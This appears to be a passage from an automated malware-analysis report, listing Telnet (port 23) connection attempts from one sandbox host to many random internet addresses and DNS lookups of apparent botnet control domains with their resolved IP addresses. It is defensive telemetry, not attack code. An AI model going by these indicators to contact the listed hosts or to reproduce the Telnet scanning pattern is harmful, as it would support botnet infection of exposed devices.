Dec 21, 2024 04:26:55.528872967 CET	56420	23	192.168.2.23	174.130.139.50
Dec 21, 2024 04:26:55.529309034 CET	46398	23	192.168.2.23	65.111.149.151
Dec 21, 2024 04:26:55.537101984 CET	43456	23	192.168.2.23	15.248.79.16
Dec 21, 2024 04:26:55.545001030 CET	41146	23	192.168.2.23	71.77.221.78
Dec 21, 2024 04:26:55.546060085 CET	39996	23	192.168.2.23	167.114.136.244
Dec 21, 2024 04:26:55.546824932 CET	57242	23	192.168.2.23	174.157.249.17
Dec 21, 2024 04:26:55.547600985 CET	57218	23	192.168.2.23	217.2.170.5
Dec 21, 2024 04:26:55.548315048 CET	58894	23	192.168.2.23	68.231.152.164
Dec 21, 2024 04:26:55.549046993 CET	37438	23	192.168.2.23	209.49.174.176
Dec 21, 2024 04:26:55.549371004 CET	23	38810	120.224.93.115	192.168.2.23
Dec 21, 2024 04:26:55.549416065 CET	38810	23	192.168.2.23	120.224.93.115
Dec 21, 2024 04:26:55.550085068 CET	39604	23	192.168.2.23	176.166.134.254
Dec 21, 2024 04:26:55.550205946 CET	23	40616	62.166.115.166	192.168.2.23
Dec 21, 2024 04:26:55.550249100 CET	40616	23	192.168.2.23	62.166.115.166
Dec 21, 2024 04:26:55.550851107 CET	34894	23	192.168.2.23	104.1.238.242
Dec 21, 2024 04:26:55.550971031 CET	23	42290	62.6.168.44	192.168.2.23
Dec 21, 2024 04:26:55.551018000 CET	42290	23	192.168.2.23	62.6.168.44
Dec 21, 2024 04:26:55.551615000 CET	46874	23	192.168.2.23	27.28.57.171
Dec 21, 2024 04:26:55.551616907 CET	23	50404	142.119.152.81	192.168.2.23
Dec 21, 2024 04:26:55.551662922 CET	50404	23	192.168.2.23	142.119.152.81
Dec 21, 2024 04:26:55.552176952 CET	23	35072	11.42.56.192	192.168.2.23
Dec 21, 2024 04:26:55.552213907 CET	35072	23	192.168.2.23	11.42.56.192
Dec 21, 2024 04:26:55.552654028 CET	35690	23	192.168.2.23	28.211.63.80
Dec 21, 2024 04:26:55.553409100 CET	40900	23	192.168.2.23	145.81.142.101
Dec 21, 2024 04:26:55.554336071 CET	55604	23	192.168.2.23	153.9.186.174
Dec 21, 2024 04:26:55.555397987 CET	57280	23	192.168.2.23	144.68.49.216
Dec 21, 2024 04:26:55.556175947 CET	53526	23	192.168.2.23	40.143.23.203
Dec 21, 2024 04:26:55.557339907 CET	52786	23	192.168.2.23	208.90.131.245
Dec 21, 2024 04:26:55.558173895 CET	50758	23	192.168.2.23	175.85.215.224
Dec 21, 2024 04:26:55.559216022 CET	33700	23	192.168.2.23	61.184.163.149
Dec 21, 2024 04:26:55.560280085 CET	57878	23	192.168.2.23	157.87.70.85
Dec 21, 2024 04:26:55.561093092 CET	54686	23	192.168.2.23	213.157.10.121
Dec 21, 2024 04:26:55.562172890 CET	34922	23	192.168.2.23	54.160.157.32
Dec 21, 2024 04:26:55.563713074 CET	50790	23	192.168.2.23	23.15.229.91
Dec 21, 2024 04:26:55.564601898 CET	48902	23	192.168.2.23	75.178.106.170
Dec 21, 2024 04:26:55.565089941 CET	56420	23	192.168.2.23	18.96.200.187
Dec 21, 2024 04:26:55.566088915 CET	44006	23	192.168.2.23	167.29.60.142
Dec 21, 2024 04:26:55.567171097 CET	57584	23	192.168.2.23	40.36.238.144
Dec 21, 2024 04:26:55.568258047 CET	41870	23	192.168.2.23	39.107.215.89
Dec 21, 2024 04:26:55.569354057 CET	35806	23	192.168.2.23	100.181.58.78
Dec 21, 2024 04:26:55.570441961 CET	41902	23	192.168.2.23	197.143.30.186
Dec 21, 2024 04:26:55.570972919 CET	46106	23	192.168.2.23	144.137.239.142
Dec 21, 2024 04:26:55.571470022 CET	35602	23	192.168.2.23	49.224.48.238
Dec 21, 2024 04:26:55.571965933 CET	36432	23	192.168.2.23	33.43.101.133
Dec 21, 2024 04:26:55.573307037 CET	39900	23	192.168.2.23	123.218.76.98
Dec 21, 2024 04:26:55.576797009 CET	23	42428	62.196.90.63	192.168.2.23
Dec 21, 2024 04:26:55.576843023 CET	42428	23	192.168.2.23	62.196.90.63
Dec 21, 2024 04:26:55.580097914 CET	41752	23	192.168.2.23	217.27.106.204
Dec 21, 2024 04:26:55.584619045 CET	43060	23	192.168.2.23	119.36.247.20
Dec 21, 2024 04:26:55.585026026 CET	56266	23	192.168.2.23	183.181.236.118
Dec 21, 2024 04:26:55.585465908 CET	53998	23	192.168.2.23	7.45.175.71
Dec 21, 2024 04:26:55.603784084 CET	45798	23	192.168.2.23	25.77.81.152
Dec 21, 2024 04:26:55.624697924 CET	23	35096	119.86.34.158	192.168.2.23
Dec 21, 2024 04:26:55.624761105 CET	35096	23	192.168.2.23	119.86.34.158
Dec 21, 2024 04:26:55.626157999 CET	23	34242	154.129.141.96	192.168.2.23
Dec 21, 2024 04:26:55.626245975 CET	34242	23	192.168.2.23	154.129.141.96
Dec 21, 2024 04:26:55.651403904 CET	48620	23	192.168.2.23	184.17.159.217
Dec 21, 2024 04:26:55.660100937 CET	34406	23	192.168.2.23	72.19.12.91
Dec 21, 2024 04:26:55.662697077 CET	38926	23	192.168.2.23	120.224.93.115
Dec 21, 2024 04:26:55.663880110 CET	23	47278	66.82.186.198	192.168.2.23
Dec 21, 2024 04:26:55.663924932 CET	47278	23	192.168.2.23	66.82.186.198
Dec 21, 2024 04:26:55.663927078 CET	23	52734	111.252.80.55	192.168.2.23
Dec 21, 2024 04:26:55.663938046 CET	23	55136	34.173.174.163	192.168.2.23
Dec 21, 2024 04:26:55.663949966 CET	23	35446	46.193.69.189	192.168.2.23
Dec 21, 2024 04:26:55.663960934 CET	23	44078	164.136.33.219	192.168.2.23
Dec 21, 2024 04:26:55.663969994 CET	23	58852	182.57.234.110	192.168.2.23
Dec 21, 2024 04:26:55.663978100 CET	52734	23	192.168.2.23	111.252.80.55
Dec 21, 2024 04:26:55.663983107 CET	23	57378	31.250.118.146	192.168.2.23
Dec 21, 2024 04:26:55.663990021 CET	55136	23	192.168.2.23	34.173.174.163
Dec 21, 2024 04:26:55.664000988 CET	44078	23	192.168.2.23	164.136.33.219
Dec 21, 2024 04:26:55.664007902 CET	35446	23	192.168.2.23	46.193.69.189
Dec 21, 2024 04:26:55.664007902 CET	58852	23	192.168.2.23	182.57.234.110
Dec 21, 2024 04:26:55.664011002 CET	23	34590	45.176.93.125	192.168.2.23
Dec 21, 2024 04:26:55.664026976 CET	23	56420	174.130.139.50	192.168.2.23
Dec 21, 2024 04:26:55.664025068 CET	57378	23	192.168.2.23	31.250.118.146
Dec 21, 2024 04:26:55.664033890 CET	23	46398	65.111.149.151	192.168.2.23
Dec 21, 2024 04:26:55.664043903 CET	23	43456	15.248.79.16	192.168.2.23
Dec 21, 2024 04:26:55.664076090 CET	34590	23	192.168.2.23	45.176.93.125
Dec 21, 2024 04:26:55.664091110 CET	56420	23	192.168.2.23	174.130.139.50
Dec 21, 2024 04:26:55.664108992 CET	46398	23	192.168.2.23	65.111.149.151
Dec 21, 2024 04:26:55.664114952 CET	43456	23	192.168.2.23	15.248.79.16
Dec 21, 2024 04:26:55.664540052 CET	56376	23	192.168.2.23	21.179.25.15
Dec 21, 2024 04:26:55.665278912 CET	23	41146	71.77.221.78	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 21, 2024 04:26:55.424849033 CET	192.168.2.23	168.138.12.137	0x9d89	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:26:55.504049063 CET	192.168.2.23	168.138.12.137	0x9d89	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:26:55.655709028 CET	192.168.2.23	168.138.12.137	0x9d89	Standard query (0)	hikvision.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:26:55.657826900 CET	192.168.2.23	168.138.12.137	0x9d89	Standard query (0)	hikvision.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:00.430489063 CET	192.168.2.23	80.152.203.134	0x2749	Standard query (0)	catlovingfools.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:00.509527922 CET	192.168.2.23	80.152.203.134	0x2749	Standard query (0)	catlovingfools.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:00.661626101 CET	192.168.2.23	80.152.203.134	0x2749	Standard query (0)	catvision.dyn. [malformed]	256	388	false
Dec 21, 2024 04:27:00.662024021 CET	192.168.2.23	80.152.203.134	0x2749	Standard query (0)	catvision.dyn. [malformed]	256	388	false
Dec 21, 2024 04:27:05.436629057 CET	192.168.2.23	194.36.144.87	0xb734	Standard query (0)	hikvision.geek. [malformed]	256	393	false
Dec 21, 2024 04:27:05.515305042 CET	192.168.2.23	194.36.144.87	0xb734	Standard query (0)	hikvision.geek. [malformed]	256	393	false
Dec 21, 2024 04:27:05.667881966 CET	192.168.2.23	194.36.144.87	0xb734	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.668142080 CET	192.168.2.23	194.36.144.87	0xb734	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.681832075 CET	192.168.2.23	81.169.136.222	0xf3d	Standard query (0)	catvision.dyn. [malformed]	256	393	false
Dec 21, 2024 04:27:05.758152962 CET	192.168.2.23	81.169.136.222	0xf3d	Standard query (0)	catvision.dyn. [malformed]	256	393	false
Dec 21, 2024 04:27:11.923083067 CET	192.168.2.23	213.202.211.221	0xccec	Standard query (0)	catvision.dyn. [malformed]	256	399	false
Dec 21, 2024 04:27:12.000170946 CET	192.168.2.23	213.202.211.221	0xccec	Standard query (0)	catvision.dyn. [malformed]	256	400	false
Dec 21, 2024 04:27:12.156678915 CET	192.168.2.23	81.169.136.222	0x3f77	Standard query (0)	catlovingfools.geek. [malformed]	256	400	false
Dec 21, 2024 04:27:12.232135057 CET	192.168.2.23	81.169.136.222	0x3f77	Standard query (0)	catlovingfools.geek. [malformed]	256	400	false
Dec 21, 2024 04:27:12.431152105 CET	192.168.2.23	185.181.61.24	0xf3e9	Standard query (0)	hikvision.geek. [malformed]	256	400	false
Dec 21, 2024 04:27:12.486761093 CET	192.168.2.23	185.181.61.24	0xf3e9	Standard query (0)	hikvision.geek. [malformed]	256	400	false
Dec 21, 2024 04:27:12.695307970 CET	192.168.2.23	168.235.111.72	0xe01	Standard query (0)	shitrocket.dyn. [malformed]	256	400	false
Dec 21, 2024 04:27:12.746684074 CET	192.168.2.23	168.235.111.72	0xe01	Standard query (0)	shitrocket.dyn. [malformed]	256	400	false
Dec 21, 2024 04:27:12.858846903 CET	192.168.2.23	80.152.203.134	0xb731	Standard query (0)	hikvision.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:12.862814903 CET	192.168.2.23	80.152.203.134	0xb731	Standard query (0)	hikvision.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:17.864353895 CET	192.168.2.23	213.202.211.221	0xccec	Standard query (0)	catvision.dyn. [malformed]	256	405	false
Dec 21, 2024 04:27:17.867774010 CET	192.168.2.23	213.202.211.221	0xccec	Standard query (0)	catvision.dyn. [malformed]	256	405	false
Dec 21, 2024 04:27:18.097522020 CET	192.168.2.23	81.169.136.222	0x3f77	Standard query (0)	catlovingfools.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.100508928 CET	192.168.2.23	81.169.136.222	0x3f77	Standard query (0)	catlovingfools.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:24.824223042 CET	192.168.2.23	213.202.211.221	0x6149	Standard query (0)	hikvision.geek. [malformed]	256	412	false
Dec 21, 2024 04:27:25.057166100 CET	192.168.2.23	152.53.15.127	0x10ba	Standard query (0)	catlovingfools.geek. [malformed]	256	413	false
Dec 21, 2024 04:27:25.302428007 CET	192.168.2.23	81.169.136.222	0x2c79	Standard query (0)	shitrocket.dyn. [malformed]	256	413	false
Dec 21, 2024 04:27:25.544867039 CET	192.168.2.23	152.53.15.127	0x6ac6	Standard query (0)	catvision.dyn. [malformed]	256	413	false
Dec 21, 2024 04:27:25.701735020 CET	192.168.2.23	81.169.136.222	0x2c79	Standard query (0)	shitrocket.dyn. [malformed]	256	413	false
Dec 21, 2024 04:27:25.748473883 CET	192.168.2.23	81.169.136.222	0x2c79	Standard query (0)	shitrocket.dyn. [malformed]	256	413	false
Dec 21, 2024 04:27:25.941761017 CET	192.168.2.23	152.53.15.127	0x6ac6	Standard query (0)	hikvision.geek. [malformed]	256	413	false
Dec 21, 2024 04:27:25.987329006 CET	192.168.2.23	152.53.15.127	0x6ac6	Standard query (0)	hikvision.geek. [malformed]	256	414	false
Dec 21, 2024 04:27:26.184750080 CET	192.168.2.23	194.36.144.87	0x11b0	Standard query (0)	catlovingfools.geek. [malformed]	256	414	false
Dec 21, 2024 04:27:26.238739014 CET	192.168.2.23	194.36.144.87	0x11b0	Standard query (0)	catlovingfools.geek. [malformed]	256	414	false
Dec 21, 2024 04:27:26.428466082 CET	192.168.2.23	217.160.70.42	0xea47	Standard query (0)	catvision.dyn. [malformed]	256	414	false
Dec 21, 2024 04:27:26.483891964 CET	192.168.2.23	217.160.70.42	0xea47	Standard query (0)	catvision.dyn. [malformed]	256	414	false
Dec 21, 2024 04:27:27.669857979 CET	192.168.2.23	51.158.108.203	0xcee8	Standard query (0)	hikvision.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.724340916 CET	192.168.2.23	51.158.108.203	0xcee8	Standard query (0)	hikvision.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:32.285319090 CET	192.168.2.23	194.36.144.87	0x11b0	Standard query (0)	hikvision.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:45.353216887 CET	192.168.2.23	213.202.211.221	0x6149	Standard query (0)	catlovingfools.geek	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:54.945265055 CET	192.168.2.23	152.53.15.127	0xec9b	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:54.993377924 CET	192.168.2.23	152.53.15.127	0xec9b	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:59.570246935 CET	192.168.2.23	168.235.111.72	0x9295	Standard query (0)	catlovingfools.geek. [malformed]	256	447	false
Dec 21, 2024 04:27:59.888437033 CET	192.168.2.23	51.158.108.203	0xcee8	Standard query (0)	hikvision.geek. [malformed]	256	447	false
Dec 21, 2024 04:28:00.129368067 CET	192.168.2.23	194.36.144.87	0xfa80	Standard query (0)	catvision.dyn. [malformed]	256	448	false
Dec 21, 2024 04:28:00.377476931 CET	192.168.2.23	81.169.136.222	0xfbf6	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.134712934 CET	192.168.2.23	168.235.111.72	0x65bc	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:02.191021919 CET	192.168.2.23	168.235.111.72	0x65bc	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:07.686148882 CET	192.168.2.23	81.169.136.222	0xb2a0	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:09.565018892 CET	192.168.2.23	81.169.136.222	0xb2a0	Standard query (0)	catlovingfools.geek. [malformed]	256	457	false
Dec 21, 2024 04:28:09.805208921 CET	192.168.2.23	168.138.12.137	0x487a	Standard query (0)	catvision.dyn. [malformed]	256	457	false
Dec 21, 2024 04:28:10.208288908 CET	192.168.2.23	109.91.184.21	0xd70	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:10.729099035 CET	192.168.2.23	168.138.12.137	0xc4e7	Standard query (0)	catlovingfools.geek. [malformed]	256	458	false
Dec 21, 2024 04:28:12.602051020 CET	192.168.2.23	194.36.144.87	0x5232	Standard query (0)	hikvision.geek. [malformed]	256	460	false
Dec 21, 2024 04:28:12.847743988 CET	192.168.2.23	152.53.15.127	0x405a	Standard query (0)	catvision.dyn. [malformed]	256	460	false
Dec 21, 2024 04:28:13.095942974 CET	192.168.2.23	51.158.108.203	0xfee0	Standard query (0)	catlovingfools.geek. [malformed]	256	461	false
Dec 21, 2024 04:28:13.337104082 CET	192.168.2.23	168.138.12.137	0xe7cf	Standard query (0)	shitrocket.dyn. [malformed]	256	461	false
Dec 21, 2024 04:28:15.734637022 CET	192.168.2.23	81.169.136.222	0xb2a0	Standard query (0)	hikvision.geek. [malformed]	256	463	false
Dec 21, 2024 04:28:15.974493980 CET	192.168.2.23	168.138.12.137	0x487a	Standard query (0)	shitrocket.dyn. [malformed]	256	464	false
Dec 21, 2024 04:28:20.980190039 CET	192.168.2.23	109.91.184.21	0xd70	Standard query (0)	catvision.dyn. [malformed]	256	468	false
Dec 21, 2024 04:28:37.508013964 CET	192.168.2.23	81.169.136.222	0xc7f7	Standard query (0)	shitrocket.dyn	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:28:40.774159908 CET	192.168.2.23	168.235.111.72	0x9295	Standard query (0)	shitrocket.dyn. [malformed]	256	488	false
Dec 21, 2024 04:28:41.100454092 CET	192.168.2.23	51.158.108.203	0xcee8	Standard query (0)	hikvision.geek. [malformed]	256	489	false
Dec 21, 2024 04:28:41.341579914 CET	192.168.2.23	194.36.144.87	0xfa80	Standard query (0)	catlovingfools.geek. [malformed]	256	489	false
Dec 21, 2024 04:28:41.588570118 CET	192.168.2.23	81.169.136.222	0xfbf6	Standard query (0)	catvision.dyn. [malformed]	256	489	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 21, 2024 04:27:05.680254936 CET	194.36.144.87	192.168.2.23	0xb734	Format error (1)	hikvision.geek. [malformed]	none	none	256	393	false
Dec 21, 2024 04:27:05.756511927 CET	194.36.144.87	192.168.2.23	0xb734	Format error (1)	hikvision.geek. [malformed]	none	none	256	393	false
Dec 21, 2024 04:27:05.912204027 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912204027 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912204027 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912204027 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912204027 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912204027 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912204027 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912329912 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912329912 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912329912 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912329912 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912329912 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912329912 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:05.912329912 CET	194.36.144.87	192.168.2.23	0xb734	No error (0)	shitrocket.dyn		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.335809946 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.335809946 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.335809946 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.335809946 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.335809946 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.335809946 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.335809946 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.339787006 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.339787006 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.339787006 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.339787006 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.339787006 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.339787006 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:18.339787006 CET	81.169.136.222	192.168.2.23	0x3f77	No error (0)	catlovingfools.geek		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:25.301016092 CET	152.53.15.127	192.168.2.23	0x10ba	Format error (1)	catlovingfools.geek. [malformed]	none	none	256	413	false
Dec 21, 2024 04:27:25.787631989 CET	152.53.15.127	192.168.2.23	0x6ac6	Format error (1)	catvision.dyn. [malformed]	none	none	256	413	false
Dec 21, 2024 04:27:26.183645010 CET	152.53.15.127	192.168.2.23	0x6ac6	Format error (1)	hikvision.geek. [malformed]	none	none	256	414	false
Dec 21, 2024 04:27:26.237559080 CET	152.53.15.127	192.168.2.23	0x6ac6	Format error (1)	hikvision.geek. [malformed]	none	none	256	414	false
Dec 21, 2024 04:27:26.427337885 CET	194.36.144.87	192.168.2.23	0x11b0	Format error (1)	catlovingfools.geek. [malformed]	none	none	256	414	false
Dec 21, 2024 04:27:26.482506990 CET	194.36.144.87	192.168.2.23	0x11b0	Format error (1)	catlovingfools.geek. [malformed]	none	none	256	414	false
Dec 21, 2024 04:27:27.910937071 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.910937071 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.910937071 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.910937071 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.910937071 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.910937071 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.910937071 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.963170052 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.963170052 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.963170052 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.963170052 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.963170052 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.963170052 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:27.963170052 CET	51.158.108.203	192.168.2.23	0xcee8	No error (0)	hikvision.geek		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:32.533533096 CET	194.36.144.87	192.168.2.23	0x11b0	No error (0)	hikvision.geek		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:32.533533096 CET	194.36.144.87	192.168.2.23	0x11b0	No error (0)	hikvision.geek		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:32.533533096 CET	194.36.144.87	192.168.2.23	0x11b0	No error (0)	hikvision.geek		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:32.533533096 CET	194.36.144.87	192.168.2.23	0x11b0	No error (0)	hikvision.geek		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:32.533533096 CET	194.36.144.87	192.168.2.23	0x11b0	No error (0)	hikvision.geek		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:32.533533096 CET	194.36.144.87	192.168.2.23	0x11b0	No error (0)	hikvision.geek		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:32.533533096 CET	194.36.144.87	192.168.2.23	0x11b0	No error (0)	hikvision.geek		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:45.585400105 CET	213.202.211.221	192.168.2.23	0x6149	No error (0)	catlovingfools.geek		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:45.585400105 CET	213.202.211.221	192.168.2.23	0x6149	No error (0)	catlovingfools.geek		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:45.585400105 CET	213.202.211.221	192.168.2.23	0x6149	No error (0)	catlovingfools.geek		185.72.8.231	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:45.585400105 CET	213.202.211.221	192.168.2.23	0x6149	No error (0)	catlovingfools.geek		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:45.585400105 CET	213.202.211.221	192.168.2.23	0x6149	No error (0)	catlovingfools.geek		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:45.585400105 CET	213.202.211.221	192.168.2.23	0x6149	No error (0)	catlovingfools.geek		176.32.32.113	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:45.585400105 CET	213.202.211.221	192.168.2.23	0x6149	No error (0)	catlovingfools.geek		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.185673952 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		212.60.5.153	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.185673952 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		212.64.215.71	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.185673952 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		212.192.13.95	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.185673952 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		80.78.26.121	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.185673952 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		86.107.100.19	A (IP address)	IN (0x0001)	false
Dec 21, 2024 04:27:55.185673952 CET	152.53.15.127	192.168.2.23	0xec9b	No error (0)	shitrocket.dyn		176.32.32.113	A (IP address)	IN (0x0001)	false
